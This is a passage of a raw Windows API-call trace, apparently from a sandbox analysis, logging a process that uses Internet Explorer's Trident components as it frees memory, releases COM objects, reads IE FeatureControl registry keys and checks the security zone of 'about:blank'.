(event=0x8005) returned 0 [0077.076] GetCurrentThreadId () returned 0x2a8 [0077.076] GetMessageW (in: lpMsg=0x18f8e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18f8e4) returned 0 [0077.076] PostMessageW (hWnd=0x202ac, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0077.076] GetCurrentThreadId () returned 0x2a8 [0077.076] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.076] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.076] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f690 | out: lpPoint=0x18f690) returned 0 [0077.076] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0077.077] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0077.077] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f678 | out: lpPoint=0x18f678) returned 0 [0077.077] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x30) returned 0x62d868 [0077.077] GetCurrentThreadId () returned 0x2a8 [0077.077] 
HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d868 | out: hHeap=0x610000) returned 1 [0077.077] GetCurrentThreadId () returned 0x2a8 [0077.077] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.077] GetCurrentThreadId () returned 0x2a8 [0077.077] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x644ee8) returned 0x0 [0077.077] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x621980 | out: hHeap=0x610000) returned 1 [0077.077] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6870c0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d9b8 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64f928 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] IntersectRect (in: lprcDst=0x18f6f8, lprcSrc1=0x18f6f8, lprcSrc2=0x18f780 | out: lprcDst=0x18f6f8) returned 1 [0077.078] IntersectRect (in: lprcDst=0x18f790, lprcSrc1=0x18f790, lprcSrc2=0x18f6f8 | out: lprcDst=0x18f790) returned 1 [0077.078] IntersectRect (in: lprcDst=0x18f7e8, lprcSrc1=0x18f7e8, lprcSrc2=0x18f780 | out: lprcDst=0x18f7e8) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652e68 | out: hHeap=0x610000) returned 1 
[0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x656798 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6568f0 | out: hHeap=0x610000) returned 1 [0077.078] GetCurrentThreadId () returned 0x2a8 [0077.078] GetCurrentThreadId () returned 0x2a8 [0077.078] GetCurrentThreadId () returned 0x2a8 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650760 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.078] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.079] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.079] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.079] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6337a8 | out: hHeap=0x610000) returned 1 [0077.079] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650fc0 | out: hHeap=0x610000) returned 1 [0077.079] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f804 | out: phkResult=0x18f804*=0x2d4) returned 0x0 [0077.079] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x18f808 | out: phkResult=0x18f808*=0x2f8) returned 0x0 [0077.079] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x18f7c4 | out: phkResult=0x18f7c4*=0x0) returned 0x2 [0077.079] RegOpenKeyExW (in: hKey=0x2d4, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, 
phkResult=0x18f7c4 | out: phkResult=0x18f7c4*=0x0) returned 0x2 [0077.079] RegCloseKey (hKey=0x0) returned 0x6 [0077.079] RegCloseKey (hKey=0x0) returned 0x6 [0077.079] RegCloseKey (hKey=0x2d4) returned 0x0 [0077.079] RegCloseKey (hKey=0x2f8) returned 0x0 [0077.079] GetCurrentThreadId () returned 0x2a8 [0077.079] GetCurrentThreadId () returned 0x2a8 [0077.080] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.080] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66df50 | out: hHeap=0x610000) returned 1 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] IUnknown:Release (This=0x65e300) returned 0x1 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] GetCurrentThreadId () returned 0x2a8 [0077.080] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18f7f8 | out: ppv=0x18f7f8*=0x6368d8) returned 0x0 [0077.081] ??3@YAXPAX@Z () returned 0x1 [0077.081] free (_Block=0x28c3048) [0077.081] ??3@YAXPAX@Z () returned 0x1 [0077.081] ??3@YAXPAX@Z () returned 0x1 [0077.081] ??3@YAXPAX@Z () returned 0x1 [0077.081] IUnknown:Release (This=0x6738a8) returned 0x0 [0077.082] ??3@YAXPAX@Z () returned 0x1 [0077.082] ??3@YAXPAX@Z () returned 0x1 [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.083] free (_Block=0x28c1058) [0077.083] free (_Block=0x28c36f8) [0077.083] free (_Block=0x28c10a0) [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.083] free (_Block=0x28c1f88) [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.083] ??3@YAXPAX@Z () returned 0x1 [0077.084] ??3@YAXPAX@Z () returned 0x1 [0077.084] ??3@YAXPAX@Z () returned 0x1 [0077.084] ??3@YAXPAX@Z () returned 0x1 [0077.084] 
StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x76766460, dwCookie=0x100) returned 0x0 [0077.084] StdGlobalInterfaceTable:IUnknown:Release (This=0x3bffa0) returned 0x1 [0077.084] IUnknown:Release (This=0x6368d8) returned 0x1 [0077.084] ??3@YAXPAX@Z () returned 0x1 [0077.084] IUnknown:Release (This=0x6368d8) returned 0x0 [0077.084] ISystemDebugEventFire:EndSession (This=0x65e300) returned 0x0 [0077.084] IUnknown:Release (This=0x65e300) returned 0x0 [0077.085] GetUserDefaultLCID () returned 0x409 [0077.085] GetACP () returned 0x4e4 [0077.085] ??3@YAXPAX@Z () returned 0x1 [0077.085] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66bce0 | out: hHeap=0x610000) returned 1 [0077.085] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6509a0 | out: hHeap=0x610000) returned 1 [0077.085] ??3@YAXPAX@Z () returned 0x1 [0077.085] GetCurrentThreadId () returned 0x2a8 [0077.086] free (_Block=0x28c12d8) [0077.086] ??3@YAXPAX@Z () returned 0x1 [0077.086] ??3@YAXPAX@Z () returned 0x1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66cdb8 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66df68 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650f68 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d1b0 | out: 
hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650910 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f140 | out: hHeap=0x610000) returned 1 [0077.086] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6707e0 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x66df80 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.087] IUnknown:Release (This=0x643e78) returned 0x0 [0077.087] IUnknown:Release (This=0x642934) returned 0x0 [0077.087] IUnknown:Release (This=0x750296bc) returned 0x1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6499b0 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f338 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.087] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6870a8 | out: hHeap=0x610000) returned 1 [0077.087] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x18f89c | out: ppURI=0x18f89c*=0x63baa4) returned 0x0 [0077.087] IUri:GetScheme (in: This=0x63baa4, pdwScheme=0x18f834 | out: pdwScheme=0x18f834*=0x11) returned 0x0 [0077.087] IUnknown:QueryInterface (in: This=0x63baa4, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x18f83c | out: ppvObject=0x18f83c*=0x63baa4) returned 0x0 [0077.088] IUnknown:Release (This=0x63baa4) returned 0x3 [0077.088] IUnknown:AddRef (This=0x63baa4) returned 0x4 [0077.088] IUnknown:Release (This=0x63baa4) returned 0x3 [0077.088] IUri:IsEqual (in: This=0x63be1c, pUri=0x63baa4, pfEqual=0x18f87c | out: 
pfEqual=0x18f87c*=0) returned 0x0 [0077.088] IUnknown:Release (This=0x63be1c) returned 0x2 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] IUnknown:AddRef (This=0x63baa4) returned 0x4 [0077.088] IUri:GetAbsoluteUri (in: This=0x63baa4, pbstrAbsoluteUri=0x644cb8 | out: pbstrAbsoluteUri=0x644cb8*="about:blank") returned 0x0 [0077.088] IUnknown:Release (This=0x63baa4) returned 0x3 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] GetCurrentProcessId () returned 0x5bc [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.088] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f398 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629400 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f3b0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: 
hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f3c8 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.089] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, 
lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64bc18 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644b28 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63b940 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64bbc0 | out: hHeap=0x610000) returned 1 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.090] IUnknown:Release (This=0x63c68c) returned 0x4 [0077.090] 
HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d788 | out: hHeap=0x610000) returned 1 [0077.090] IUnknown:Release (This=0x63c68c) returned 0x3 [0077.090] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fef8 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624170 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650030 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fe88 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f308 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63cef0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fcd8 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.091] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6510c8 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650ac0 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651598 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x658ba8 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651438 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: 
hHeap=0x610000, dwFlags=0x0, lpMem=0x650c40 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d830 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67b768 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65ebb8 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67b670 | out: hHeap=0x610000) returned 1 [0077.092] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6515f0 | out: hHeap=0x610000) returned 1 [0077.093] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x682c88 | out: hHeap=0x610000) returned 1 [0077.093] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6833a0 | out: hHeap=0x610000) returned 1 [0077.093] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x63b940 [0077.093] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x50) returned 0x651438 [0077.093] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x651438 | out: hHeap=0x610000) returned 1 [0077.093] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.093] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x64292c, dwReserved=0x0 | out: ppSM=0x64292c*=0x65d270) returned 0x0 [0077.093] IInternetSecurityManager:SetSecuritySite (This=0x65d270, pSite=0x642934) returned 0x0 [0077.093] IUnknown:AddRef (This=0x642934) returned 0x31 [0077.093] IUnknown:QueryInterface (in: This=0x642934, riid=0x768261d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18f514 | out: ppvObject=0x18f514*=0x642938) returned 0x0 [0077.093] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x7682f13c*(Data1=0xf1e50292, 
Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x65d298 | out: ppvObject=0x65d298*=0x0) returned 0x80004002 [0077.094] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x7682f12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x65d294 | out: ppvObject=0x65d294*=0x0) returned 0x80004002 [0077.094] IServiceProvider:QueryService (in: This=0x642938, guidService=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7681c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x65d290 | out: ppvObject=0x65d290*=0x750296bc) returned 0x0 [0077.094] IUnknown:Release (This=0x642938) returned 0x0 [0077.094] IUnknown:AddRef (This=0x63baa4) returned 0x4 [0077.094] IInternetSecurityManager:MapUrlToZone (in: This=0x750296bc, pwszUrl="about:blank", pdwZone=0x18f54c, dwFlags=0x0 | out: pdwZone=0x18f54c*=0xffffffff) returned 0x800c0011 [0077.094] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0077.094] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0077.094] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0077.094] IInternetSecurityManager:ProcessUrlAction (in: This=0x750296bc, pwszUrl="about:blank", dwAction=0x2106, pPolicy=0x18f550, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x18f550*=0x0) returned 0x0 [0077.094] IUnknown:Release (This=0x63baa4) returned 0x3 [0077.094] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f290 | out: 
hHeap=0x610000) returned 1 [0077.094] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.094] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.095] IUnknown:Release (This=0x620638) returned 0x1 [0077.095] IUnknown:Release (This=0x63baa4) returned 0x2 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644cb8 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x659f60 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x648818 | out: hHeap=0x610000) returned 1 [0077.095] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x68) returned 0x6876d0 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6876d0 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x687660 | out: hHeap=0x610000) returned 1 [0077.095] LsDestroyContext () returned 0x0 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6650a0 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x650a90 | out: hHeap=0x610000) returned 1 [0077.095] HeapFree (in: hHeap=0x610000, dwFlags=0x0, 